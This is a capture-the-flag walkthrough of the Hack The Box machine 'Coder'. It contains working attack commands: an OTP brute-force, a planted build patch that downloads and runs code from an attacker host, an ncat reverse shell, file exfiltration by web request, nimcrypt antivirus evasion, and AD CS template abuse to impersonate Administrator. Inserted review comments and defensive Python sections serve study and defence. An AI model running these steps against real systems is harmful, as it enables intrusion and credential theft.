Scanning
> TARGET=10.129.202.102 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-04-03 03:35:05Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.coder.htb
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-30T04:24:26
| Not valid after: 2023-06-30T04:24:26
| MD5: 7a8963c8621ca1c1a510001350d86800
| SHA-1: 93e2a8bd85dc5a8767ffa4c131003634d14db0d7
|_ssl-date: 2023-04-03T03:36:22+00:00; +6h25m37s from scanner time.
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-04-03T03:36:21+00:00; +6h25m38s from scanner time.
| ssl-cert: Subject: commonName=default-ssl/organizationName=HTB/stateOrProvinceName=CA/countryName=US/localityName=Somewhere/organizationalUnitName=IT
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-04T17:25:43
| Not valid after: 2032-11-01T17:25:43
| MD5: e5fea439d8356660c2b778e578a1244e
| SHA-1: 733cf4571caafdaa8ad1e8fb0abc6fec7f932977
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127
|_ssl-date: 2023-04-03T03:36:21+00:00; +6h25m38s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.coder.htb
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-30T04:24:26
| Not valid after: 2023-06-30T04:24:26
| MD5: 7a8963c8621ca1c1a510001350d86800
| SHA-1: 93e2a8bd85dc5a8767ffa4c131003634d14db0d7
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62968/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Enum
- Subdomain enumeration, nothing found:
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://coder.htb/" -H "Host: FUZZ.coder.htb"
> kerbrute userenum -d coder.htb --dc $TARGET /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
2023/04/02 17:38:39 > [+] VALID USERNAME: E.BLACK@coder.htb
2023/04/02 17:41:01 > [+] VALID USERNAME: J.BRIGGS@coder.htb
- Found an SMB share named Development:
> smbclient -L \\\\10.129.202.102\\ -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
- In the Temporary Projects folder, there is an .exe and an .enc file:
smb: \> cd "Temporary Projects"
smb: \Temporary Projects\> ls
. D 0 Fri Nov 11 17:19:03 2022
.. D 0 Fri Nov 11 17:19:03 2022
Encrypter.exe A 5632 Fri Nov 4 12:51:59 2022
s.blade.enc A 3808 Fri Nov 11 17:17:08 2022
6232831 blocks of size 4096. 904958 blocks available
- In the Migrations folder, there are a lot of files.
- Recursively download everything from the Migrations folder:
smb: \> cd Migrations
smb: \Migrations\> mask ""
smb: \Migrations\> recurse ON
smb: \Migrations\> prompt OFF
smb: \Migrations\> mget *
Encrypter.exe reverse engineering
- Reading from the SMB share, the file s.blade.enc was last changed at Fri Nov 11 05:17:08 PM 2022 EST.
- This corresponds to 1668140228:
smb: \Temporary Projects\> allinfo s.blade.enc
altname: SBLADE~1.ENC
create_time: Mon Nov 7 04:05:03 PM 2022 EST
access_time: Fri Nov 11 05:17:08 PM 2022 EST
write_time: Fri Nov 11 05:17:08 PM 2022 EST
change_time: Fri Nov 11 05:17:08 PM 2022 EST
- Using dotPeek to reverse the Encrypter.exe binary, it turns out to be an AES encryption tool; the IV and key are drawn from System.Random seeded with the Unix time at which the tool ran, so both can be regenerated from the file's timestamp:
using System;
using System.IO;
using System.Security.Cryptography;

internal class AES
{
    public static void Main(string[] args)
    {
        if (args.Length != 1)
        {
            Console.WriteLine("You must provide the name of a file to encrypt.");
        }
        else
        {
            FileInfo fileInfo = new FileInfo(args[0]);
            string destFile = Path.ChangeExtension(fileInfo.Name, ".enc");
            // System.Random is not a CSPRNG and is seeded with the current Unix time,
            // so the IV and key below are fully determined by the second the tool ran
            Random random = new Random(Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds()));
            byte[] numArray1 = new byte[16];   // IV
            random.NextBytes(numArray1);
            byte[] numArray2 = new byte[32];   // AES-256 key
            random.NextBytes(numArray2);
            AES.EncryptFile(fileInfo.Name, destFile, numArray2, numArray1);
        }
    }

    private static byte[] EncryptFile(string sourceFile, string destFile, byte[] Key, byte[] IV)
    {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            using (FileStream fileStream1 = new FileStream(destFile, FileMode.Create))
            {
                using (ICryptoTransform encryptor = rijndaelManaged.CreateEncryptor(Key, IV))
                {
                    using (CryptoStream cryptoStream = new CryptoStream((Stream) fileStream1, encryptor, CryptoStreamMode.Write))
                    {
                        using (FileStream fileStream2 = new FileStream(sourceFile, FileMode.Open))
                        {
                            byte[] buffer = new byte[1024];
                            int count;
                            while ((count = fileStream2.Read(buffer, 0, buffer.Length)) != 0)
                                cryptoStream.Write(buffer, 0, count);
                        }
                    }
                }
            }
        }
        return (byte[]) null;
    }
}
- Modify the above code to decrypt the s.blade.enc file; the decrypted output is actually a 7z file:
using System;
using System.IO;
using System.Security.Cryptography;

internal class AES
{
    public static void Main(string[] args)
    {
        string fileInfo = "C:\\test\\file.enc";
        string destFile = "C:\\test\\file.txt";
        //Random random = new Random(Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds()));
        // Seed with the recovered timestamp instead of the current time, so the
        // same IV and key come out as at encryption time
        Random random = new Random(Convert.ToInt32(1668205028));
        byte[] numArray1 = new byte[16];   // IV
        random.NextBytes(numArray1);
        byte[] numArray2 = new byte[32];   // AES-256 key
        random.NextBytes(numArray2);
        AES.DecryptFile(fileInfo, destFile, numArray2, numArray1);
    }

    private static byte[] DecryptFile(string sourceFile, string destFile, byte[] Key, byte[] IV)
    {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            using (FileStream fileStream1 = new FileStream(destFile, FileMode.Create))
            {
                using (ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor(Key, IV))
                {
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)fileStream1, decryptor, CryptoStreamMode.Write))
                    {
                        using (FileStream fileStream2 = new FileStream(sourceFile, FileMode.Open))
                        {
                            byte[] buffer = new byte[1024];
                            int count;
                            while ((count = fileStream2.Read(buffer, 0, buffer.Length)) != 0)
                            {
                                cryptoStream.Write(buffer, 0, count);
                            }
                        }
                    }
                }
            }
        }
        return (byte[])null;
    }
}
- Extracting the 7z archive gives the following:
> ls -la
total 16
drwxr-xr-x 2 root root 4096 Apr 3 06:07 .
drwxr-xr-x 4 root root 4096 Apr 3 06:07 ..
-rw-r--r-- 1 root root 1024 Nov 3 16:02 .key
-rw-r--r-- 1 root root 2590 Nov 11 17:13 s.blade.kdbx
Defeating otp -> Teamcity
> kpcli
kpcli:/> open s.blade.kdbx .key
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. Authenticator backup codes
1. O365
2. Teamcity teamcity-dev.coder.htb
kpcli:/Root> show 0
Title: Authenticator backup codes
Uname:
Pass:
URL:
Notes: {
"6132e897-44a2-4d14-92d2-12954724e83f": {
"encrypted": true,
"hash": "6132e897-44a2-4d14-92d2-12954724e83f",
"index": 1,
"type": "totp",
"secret": "U2FsdGVkX1+3JfFoKh56OgrH5jH0LLtc+34jzMBzE+QbqOBTXqKvyEEPKUyu13N2",
"issuer": "TeamCity",
"account": "s.blade"
},
"key": {
"enc": "U2FsdGVkX19dvUpQDCRui5XaLDSbh9bP00/1iBSrKp7102OR2aRhHN0s4QHq/NmYwxadLeTN7Me1a3LrVJ+JkKd76lRCnd1utGp/Jv6w0hmcsqdhdccOpixnC3wAnqBp+5QyzPVaq24Z4L+Rx55HRUQVNLrkLgXpkULO20wYbQrJYN1D8nr3g/G0ukrmby+1",
"hash": "$argon2id$v=19$m=16384,t=1,p=1$L/vKleu5gFis+GLZbROCPw$OzW14DA0kdgIjCbo6MPDYoh+NEHnNCNV"
}
}
kpcli:/Root> show 1
Title: O365
Uname: s.blade@coder.htb
Pass: AmcwNO60Zg3vca3o0HDrTC6D
URL:
Notes:
kpcli:/Root> get 1 Pass
AmcwNO60Zg3vca3o0HDrTC6D
kpcli:/Root> show 2
Title: Teamcity
Uname: s.blade
Pass: veh5nUSZFFoqz9CrrhSeuwhA
URL: https://teamcity-dev.coder.htb
Notes:
kpcli:/Root> get 2 Pass
veh5nUSZFFoqz9CrrhSeuwhA
- Then we can use the found credential for teamcity-dev.coder.htb to log in, and it has MFA as well. However, after some trials you find out that the one-time password is not actually one-time: no matter how many failed attempts you make, it doesn't expire, so we can brute-force the 6-digit OTP here.
- Use Burp to intercept the request and pass it to ffuf; below is an example request from Burp:
POST /2fa.html HTTP/2
Host: teamcity-dev.coder.htb
Cookie: TCSESSIONID=6C934D38FD2B1C10DC94EB718D381AD7; __test=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://teamcity-dev.coder.htb/2fa.html
X-Requested-With: XMLHttpRequest
X-Teamcity-Client: Web UI
X-Tc-Csrf-Token: a9a07a59-729a-4e14-97b5-5e265a3bd1e7
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: https://teamcity-dev.coder.htb
Content-Length: 15
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
password=116384
- I compiled the list of 6-digit numbers using rockyou.txt:
> grep -o '[0-9][0-9][0-9][0-9][0-9][0-9]' /usr/share/wordlists/rockyou.txt > numbers.txt
> sort -u numbers.txt > number.txt
- Eventually we can brute-force it and find the OTP; note the OTP is different each time.
> ffuf -request 2fa.req -w number.txt -X POST -d "password=FUZZ" -u https://teamcity-dev.coder.htb/2fa.html -fs 89 -t 160
619433 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 282ms]
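The weakness exploited above is the missing server-side handling of the second factor: a code stays valid after any number of failures, nothing is spent once accepted, and nothing locks. As an added illustration (not TeamCity code and not part of the original writeup), the Python below implements an RFC 6238 TOTP verifier with those three controls: an accepted code is rejected on replay, failures are counted, and a burst of failures locks the session. The secret is the RFC 6238 Appendix B test key; the timestamps and attempt limits are constructed for the demo.

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1, the variant authenticator apps use."""
    counter = struct.pack(">Q", unix_time // step)
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class OtpVerifier:
    """Second-factor check with the controls the 2fa.html endpoint above lacked:
    an accepted code is never accepted again, failures are counted, and a burst
    of failures locks the session for a while (limits are constructed values)."""

    def __init__(self, secret: bytes, max_failures: int = 5, lockout_seconds: int = 300,
                 step: int = 30, digits: int = 6):
        self.secret = secret
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.step = step
        self.digits = digits
        self.failures = 0
        self.locked_until = 0       # unix time until which every attempt is refused
        self.last_counter = None    # time-step counter of the last accepted code

    def verify(self, code: str, now: int) -> str:
        """Return 'ok', 'bad', 'replay' or 'locked' for a submitted code."""
        if now < self.locked_until:
            return "locked"
        # Tolerate one step of clock drift either side, as most servers do.
        for drift in (-1, 0, 1):
            counter = (now + drift * self.step) // self.step
            if counter < 0:
                continue
            expected = totp(self.secret, counter * self.step, self.step, self.digits)
            if hmac.compare_digest(expected, code):
                if self.last_counter is not None and counter <= self.last_counter:
                    return "replay"   # this code (or an older one) was already spent
                self.failures = 0
                self.last_counter = counter
                return "ok"
        self.failures += 1
        if self.failures >= self.max_failures:
            self.failures = 0
            self.locked_until = now + self.lockout_seconds
            return "locked"
        return "bad"


def attempts_before_lockout(verifier: OtpVerifier, now: int, guesses) -> int:
    """Count how many guesses the verifier answers before it stops with ok/locked."""
    tried = 0
    for guess in guesses:
        tried += 1
        if verifier.verify(guess, now) in ("ok", "locked"):
            break
    return tried


if __name__ == "__main__":
    secret = b"12345678901234567890"          # RFC 6238 test secret, not a real one
    guesses = (str(n).zfill(6) for n in range(1_000_000))
    print("guesses answered before lockout:",
          attempts_before_lockout(OtpVerifier(secret), 100, guesses))
```

With a 6-digit code and a list of every number, the verifier above answers at most `max_failures` guesses per lockout window instead of all of them; the replay check also covers the case where the same code is submitted again after a successful login.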
- After logging into the TeamCity web app, you can run a build.
- The build can be run as a personal build, where you can upload a patch file.
- Remember Development\Migrations\teamcity_test_repo: it is a git repo where a simple script called hello_world.ps1 can be found.
- On TeamCity, there is a build job called Development_Testing that points to this repo. So we can create a patch using the repo we fetched from SMB, upload the patch, and let TeamCity run the patched version of the script.
- To create a patch, change the existing Development\Migrations\teamcity_test_repo\hello_world.ps1 file:
#Simple repo test for Teamcity pipeline
write-host "Helloooooooooooooooooo"
IEX (New-Object Net.WebClient).DownloadString('http://<attacker>/shell.ps1')
- Create a patch for the change:
> git diff --oneline --graph 4aefc023afb818866bd8c0920d438b44e76f642b > patch.diff
- Before we upload this patch to TeamCity, let's create a shell.ps1 script and serve it with an HTTP server; this script can contain any code we'd like to run.
- This way we are able to execute a PowerShell script on the target inside TeamCity's build. To create a reverse shell, we use ncat.exe from nmap (https://nmap.org/), because this one doesn't get detected by Windows Defender.
- We need to upload three files to the target to be able to use ncat.exe:
Invoke-WebRequest -URI http://<attacker>/ncat.exe -OutFile C:\Users\svc_teamcity\Documents\ncat.exe
Invoke-WebRequest -URI http://<attacker>/libcrypto-3.dll -OutFile C:\Users\svc_teamcity\Documents\libcrypto-3.dll
Invoke-WebRequest -URI http://<attacker>/libssl-3.dll -OutFile C:\Users\svc_teamcity\Documents\libssl-3.dll
ls C:\Users\svc_teamcity\Documents\
# for persistent shell, otherwise the shell terminates every 2 minutes
Invoke-Expression 'cmd /c start C:\Users\svc_teamcity\Documents\ncat.exe <attacker> 4444 -e cmd.exe'
Start-Sleep -Seconds 3600
- Now, once everything is prepared, run a build, make it run as a personal build, then upload patch.diff to it.
- Observe our HTTP server: the TeamCity build will apply the patch and fetch our shell.ps1 script, which returns us a reverse shell. Note: the lifetime of the shell is very short.
- To improve the shell lifetime, use the following:
Invoke-Expression 'cmd /c start C:\Users\svc_teamcity\Documents\ncat.exe <attacker> 4444 -e cmd.exe'
Start-Sleep -Seconds 3600
ALL_USERS_GROUP
All Users
Contains all TeamCity users
admin
<$2a$07$C1mKhkoe2iSBckV6afRAk.axurQlb0qfG9HcmAnZbKb8ze72JPVxu
BCRYPT
s.blade
<$2a$07$ZFoMFfAMVXp7NMMoqiqS2ObEmLku16FjoIwM93ImTPuCqkPFAvA6e
Sonya Blade
s.blade@coder.htb
BCRYPT
e.black
<$2a$07$8rZyG7lU9.1/Wo3EdFf5zuN4NNLZXB7K02LFN6qVHCJIAdVP1X3AK
Erron Black
e.black@coder.htb
YR.C
BCRYPT
User flag: e.black
- Found a patch file at c:\ProgramData\JetBrains\TeamCity\system\changes:
c:\ProgramData\JetBrains\TeamCity\system\changes>type 101.changes.diff
diff --git a/Get-ADCS_Report.ps1 b/Get-ADCS_Report.ps1
index d6515ce..a990b2e 100644
--- a/Get-ADCS_Report.ps1
+++ b/Get-ADCS_Report.ps1
@@ -77,11 +77,15 @@ Function script:send_mail {
[string]
$subject
)
+
+$key = Get-Content ".\key.key"
+$pass = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key)
+$cred = New-Object -TypeName System.Management.Automation.PSCredential ("coder\e.black",$pass)
$emailFrom = 'pkiadmins@coder.htb'
$emailCC = 'e.black@coder.htb'
$emailTo = 'itsupport@coder.htb'
$smtpServer = 'smtp.coder.htb'
-Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High
+Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High -Credential $cred
}
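Review bot: the new `$key`, `$pass` and `$cred` lines in send_mail read the AES key from .\key.key and the encrypted password from .\enc.txt, both of which are added to the repository in this same change, so anyone who can read the repo can run the same two lines and recover the coder\e.black password. Take the credential from a secret store or a DPAPI-protected store on the host that runs the report, and do not hard-code the account name in the script.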
diff --git a/enc.txt b/enc.txt
new file mode 100644
index 0000000..d352634
--- /dev/null
+++ b/enc.txt
@@ -0,0 +1,2 @@
+76492d1116743f0423413b16050a5345MgB8AGoANABuADUAMgBwAHQAaQBoAFMAcQB5AGoAeABlAEQAZgBSAFUAaQBGAHcAPQA9AHwANABhADcANABmAGYAYgBiAGYANQAwAGUAYQBkAGMAMQBjADEANAAwADkAOQBmADcAYQBlADkAMwAxADYAMwBjAGYAYwA4AGYAMQA3ADcAMgAxADkAYQAyAGYAYQBlADAAOQA3ADIAYgBmAGQAN
+AA2AGMANQBlAGUAZQBhADEAZgAyAGQANQA3ADIAYwBjAGQAOQA1ADgAYgBjAGIANgBhAGMAZAA4ADYAMgBhADcAYQA0ADEAMgBiAGIAMwA5AGEAMwBhADAAZQBhADUANwBjAGQANQA1AGUAYgA2AGIANQA5AGQAZgBmADIAYwA0ADkAMgAxADAAMAA1ADgAMABhAA==
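Review bot: enc.txt is an exported SecureString; the 76492d1116743f0423413b16050a5345 prefix is the form written with -Key, which is portable AES rather than DPAPI, so it is only as secret as the key file committed beside it. It is also wrapped across two lines here. Keep the file out of version control entirely, and if a file must exist, store it outside the repository with restrictive ACLs.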
diff --git a/key.key b/key.key
new file mode 100644
index 0000000..a6285ed
--- /dev/null
+++ b/key.key
@@ -0,0 +1,32 @@
+144
+255
+52
+33
+65
+190
+44
+106
+131
+60
+175
+129
+127
+179
+69
+28
+241
+70
+183
+53
+153
+196
+10
+126
+108
+164
+172
+142
+119
+112
+20
+122
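Review bot: key.key is the 32-byte AES key, one decimal byte per line, that protects enc.txt; committing it next to the ciphertext makes the encryption pointless. Remove both files from the repository and its history, and rotate the e.black password, since the key must be treated as disclosed once it has been pushed.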
> git apply 101.changes.diff
- This will create two files: enc.txt and key.key.
- These two files can be used to uncover the password for e.black: ypOSJXPqlDOxxbQSfEERy300
$key = Get-Content ".\key.key"
$SecurePassword = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key)
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecurePassword)
$UnsecurePassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
[Runtime.InteropServices.Marshal]::ZeroFreeBSTR($BSTR)
$UnsecurePassword
# ypOSJXPqlDOxxbQSfEERy300
> evil-winrm -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -i coder.htb
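The enc.txt / key.key pair is a general pattern worth recognising when reviewing repositories: ConvertFrom-SecureString -Key writes the prefix 76492d1116743f0423413b16050a5345 followed by base64 of the UTF-16LE string "2|<base64 IV>|<hex AES-CBC ciphertext>", whereas the DPAPI form (no -Key) is the hex of a CryptProtectData blob that starts 01000000d08c9ddf0115d1118c7a00c04fc297eb and is bound to the user or machine. The Python below is an added example (not from the writeup) for triaging such files: it classifies an export, parses the -Key form (joining wrapped lines, as in the two-line enc.txt above), and spots a candidate key file laid out one byte per line like key.key. The sample blob is constructed, not the one from the box, and the code does no decryption.

```python
import base64
from dataclasses import dataclass

# Prefix ConvertFrom-SecureString emits when -Key / -SecureKey was used (portable AES)
KEY_HEADER = "76492d1116743f0423413b16050a5345"
# Prefix of a DPAPI blob, which is what ConvertFrom-SecureString emits without -Key
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"


@dataclass
class KeyProtectedBlob:
    version: str
    iv: bytes
    ciphertext: bytes


def classify_securestring(text: str) -> str:
    """'aes-key' (decryptable by anyone holding the key file), 'dpapi' or 'unknown'."""
    compact = "".join(text.split()).lower()   # exports are sometimes wrapped over lines
    if compact.startswith(KEY_HEADER):
        return "aes-key"
    if compact.startswith(DPAPI_HEADER):
        return "dpapi"
    return "unknown"


def parse_key_protected(text: str) -> KeyProtectedBlob:
    """Split a -Key export into its version, IV and ciphertext without decrypting it."""
    compact = "".join(text.split())
    if not compact.lower().startswith(KEY_HEADER):
        raise ValueError("not a -Key protected SecureString export")
    inner = base64.b64decode(compact[len(KEY_HEADER):]).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|")
    return KeyProtectedBlob(version, base64.b64decode(iv_b64), bytes.fromhex(ct_hex))


def looks_like_key_file(text: str) -> bool:
    """True for 16, 24 or 32 decimal byte values one per line: the shape -Key accepts."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) not in (16, 24, 32):
        return False
    return all(ln.isdigit() and int(ln) <= 255 for ln in lines)


def make_sample(iv: bytes, ciphertext: bytes) -> str:
    """Build a constructed -Key export for the demo; the ciphertext is arbitrary bytes."""
    inner = "2|" + base64.b64encode(iv).decode() + "|" + ciphertext.hex()
    return KEY_HEADER + base64.b64encode(inner.encode("utf-16-le")).decode()


def triage_repo(files: dict) -> dict:
    """Map file name -> classification for a set of repository files (name -> content)."""
    report = {}
    for name, content in files.items():
        kind = classify_securestring(content)
        if kind == "unknown" and looks_like_key_file(content):
            kind = "candidate-aes-key"
        report[name] = kind
    return report


if __name__ == "__main__":
    # Constructed repository contents, not the real enc.txt/key.key
    sample = make_sample(bytes(range(16)), b"\x11" * 16)
    repo = {"enc.txt": sample[:60] + "\n" + sample[60:],
            "key.key": "\n".join(str(b) for b in range(32)),
            "README.md": "report script"}
    print(triage_repo(repo))
    print(parse_key_protected(repo["enc.txt"]))
```

A -Key export sitting in the same repository as a file that `looks_like_key_file` accepts is the finding to raise; the IV is stored in the clear and the only secret is the key file.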
- Alternatively, we can also run as e.black and leak the user flag:
# in svc_teamcity's shell
$SecPassword = ConvertTo-SecureString 'ypOSJXPqlDOxxbQSfEERy300' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('e.black', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { IEX(New-Object Net.WebClient).downloadString('http://<attacker>/shell2.ps1') }
# shell2.ps1
$result=Get-Content "C:\Users\e.black\Desktop\user.txt"
Invoke-WebRequest -URI http://<attacker>/?$result
PE Enum
- Enumerating the LDAP directory, the user e.black belongs to the PKI Admins group, so is able to modify Certificate Templates.
*Evil-WinRM* PS C:\Users\e.black\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\e.black\Documents> (Get-Acl -Path "AD:CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb").Access
> ldapdomaindump -u 'coder.htb\e.black' -p ypOSJXPqlDOxxbQSfEERy300 ldaps://coder.htb
PE: root
> ./nimcrypt -f Rubeus.exe -t csharp -u -e -o NimRubeus.exe
> ./nimcrypt -f Certify.exe -t csharp -u -e -o NimCertify.exe
# on target
Invoke-WebRequest -URI http://<attacker>/NimCertify.exe -outfile NimCertify.exe
Invoke-WebRequest -URI http://<attacker>/NimRubeus.exe -outfile NimRubeus.exe
Invoke-WebRequest -URI http://<attacker>/ADCSTemplate/ADCSTemplate.psm1 -outfile ADCSTemplate.psm1
Invoke-WebRequest -URI http://<attacker>/ADCSTemplate/ADCSTemplate.psd1 -outfile ADCSTemplate.psd1
Import-Module .\ADCSTemplate.psm1
Export-ADCSTemplate -displayname "Administrator" > .\Administrator.json
# get the json to kali
> download Administrator.json
# modify the template
# "msPKI-Certificate-Name-Flag": 65537,
# re-upload to target
Invoke-WebRequest -URI http://<attacker>/FakeAdmin.json -outfile FakeAdmin.json
New-ADCSTemplate -DisplayName FakeAdmin -JSON (Get-Content .\FakeAdmin.json -Raw) -Identity e.black -AutoEnroll -Publish
# this will generate a certificate, copy it to kali
.\NimCertify.exe request /ca:dc01.coder.htb\coder-DC01-CA /template:FakeAdmin /altname:Administrator
# in kali
> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# upload to target
Invoke-WebRequest -URI http://<attacker>/cert.pfx -outfile cert.pfx
# this will generate a ticket in base64
.\NimRubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
- Copy the base64 ticket and save to a file
kirbi.b64
> cat kirbi.b64 | base64 -d > ticket.kirbi
> /usr/bin/impacket-ticketConverter ticket.kirbi ticket.ccache
> export KRB5CCNAME=ticket.ccache
# login to get the root flag
> wmiexec.py coder.htb/Administrator@dc01.coder.htb -k -no-pass -debug
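What made the FakeAdmin template usable is the msPKI-Certificate-Name-Flag value 65537 set above, which is 0x10001, i.e. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT together with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME, on a template whose EKUs allow logon. As an added defensive check (not part of the writeup, the ADCSTemplate module or Certify), the Python below audits template exports of the kind Export-ADCSTemplate produces: it decodes the name-flag bitmask, reports templates that combine requester-chosen names with a logon-capable EKU, and diffs two exports to catch a newly published template. The flag bits follow MS-CRTD section 2.27; the JSON samples, their numeric values and the pKIExtendedKeyUsage lists are constructed for the demo.

```python
import json

# msPKI-Certificate-Name-Flag bit values (MS-CRTD section 2.27)
NAME_FLAGS = {
    0x00000001: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT",
    0x00010000: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME",
    0x00400000: "CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS",
    0x00800000: "CT_FLAG_SUBJECT_ALT_REQUIRE_SPN",
    0x01000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID",
    0x02000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_UPN",
    0x04000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL",
    0x08000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_DNS",
    0x10000000: "CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN",
    0x20000000: "CT_FLAG_SUBJECT_REQUIRE_EMAIL",
    0x40000000: "CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME",
    0x80000000: "CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH",
}

# EKUs that make a certificate usable for domain logon
LOGON_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
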